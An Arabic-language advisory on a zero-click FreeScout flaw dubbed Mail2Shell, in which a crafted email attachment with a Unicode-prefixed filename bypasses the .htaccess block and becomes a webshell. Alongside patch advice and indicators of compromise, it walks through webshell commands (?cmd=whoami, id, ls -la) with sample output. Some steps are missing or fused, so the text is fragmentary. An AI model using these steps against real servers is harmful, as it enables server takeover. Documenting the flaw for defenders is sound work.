
CVE-2026-28289

ثغرة تنفيذ أكواد عن بُعد (RCE) بدون أي نقرة ودون مصادقة في FreeScout عبر تجاوز فحص مرفقات البريد الإلكتروني
CVE-2026-28289، التي تُعرف باسم Mail2Shell، هي ثغرة حرجة من نوع تنفيذ الأكواد عن بُعد (RCE) بدون أي نقرة (Zero-Click) تؤثر على FreeScout.
يمكن للمهاجم إرسال بريد إلكتروني مصمم خصيصًا إلى صندوق بريد FreeScout والحصول على وصول إلى شل (Shell) عن بُعد على الخادم المستضيف لها — دون مصادقة ودون أي تفاعل من المستخدم.
يرسل المهاجم بريدًا إلكترونيًا يحتوي على مرفق مصمم خصيصًا.
يحاول FreeScout حظر الملفات الخطيرة مثل .htaccess، لكن المهاجم:
يصل المهاجم إلى الملف المرفوع عبر مسار ويب وينفذ أوامر عشوائية.
النتيجة:
# Remote shell access achieved
whoami
www-data
✅ Email sent successfully! (Zero-Click RCE triggered)
سترى أيضًا التعليمات الخاصة بالخطوات التالية مطبوعة على الشاشة.
find على خادم FreeScout عبر SSHسيعيد لك فورًا المسار الكامل الحقيقي للملف المرفوع، على سبيل المثال:
/var/www/html/storage/attachment/2026/03/05/15/webshell.txt
(أو مجلد مشابه باسم التاريخ/الوقت — وهذا يؤكد أن FreeScout حفظ المرفق تلقائيًا).
انسخ المسار من الخطوة 2 وافتح عنوان URL هذا:
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=whoami
سترى هذا الناتج بالضبط (نص عادي):
www-data
(أو أيًا كان مستخدم Apache/PHP على خادمك — عادةً www-data أو apache أو nobody).
الآن غيّر الأمر وحدّث الصفحة:
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=id
سترى:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
وبالنسبة للأمر ls -la:
total 12
drwxr-xr-x 2 www-data www-data 4096 Mar 5 15:00 .
drwxr-xr-x 8 www-data www-data 4096 Mar 5 14:00 ..
-rw-r--r-- 1 www-data www-data 87 Mar 5 15:00 webshell.txt
يظهر هذا الناتج مباشرةً في صفحة المتصفح (داخل وسوم <pre> الخاصة بـ webshell). لا أخطاء، ولا كود PHP مصدري، ولا 404.
هذا يعني أنك تمتلك تنفيذ أكواد كاملًا عن بُعد على الخادم — لقد نجح تجاوز .htaccess + مسافة العرض الصفري (Zero-Width Space) بشكل مثالي، وتمت معالجة مرفق البريد الإلكتروني دون أي تفاعل من المستخدم.
جميع إصدارات FreeScout:
<= 1.8.206
قم بالترقية فورًا إلى:
1.8.207 or later
AllowOverride All في إعدادات Apacheابحث عن:
.htaccess مشبوهة/storage/attachments/قد تتضمن مؤشرات الاختراق (Indicators of Compromise) ما يلي:
.htaccess غير معروفة في مجلدات المرفقاتEmail → Malicious Attachment (Unicode prefixed filename)
↓
Saved to predictable path
↓
Web-accessible execution
↓
Remote shell
تجاوزت هذه المشكلة الحمايات التي أُضيفت في:
مما يدل على أن منطق تعقيم أسماء الملفات غير مكتمل.
| مجال المخاطرة | الأثر |
|---|---|
| السرية | 🔴 مرتفع |
| السلامة | 🔴 مرتفع |
| التوفر | 🔴 مرتفع |
إذا كنت تشغّل نسخة من FreeScout مستضافة ذاتيًا (Self-Hosted):
🔥 قم بتطبيق التصحيح فورًا. 💡 افترض حدوث اختراق إذا كنت تشغّل إصدارات عرضة للخطر ومعرّضة للإنترنت. 🛡 قم بمراجعة السجلات (Logs) وإجراء فحوصات السلامة.
| الحقل | القيمة |
|---|
| CVE ID | CVE-2026-28289 |
| درجة الخطورة | 🔴 حرجة |
| CVSS | 10.0 (الحد الأقصى) |
| ناقل الهجوم | عن بُعد (عبر البريد الإلكتروني) |
| المصادقة المطلوبة | ❌ لا |
| تفاعل المستخدم | ❌ لا |
| الأثر | اختراق كامل للخادم |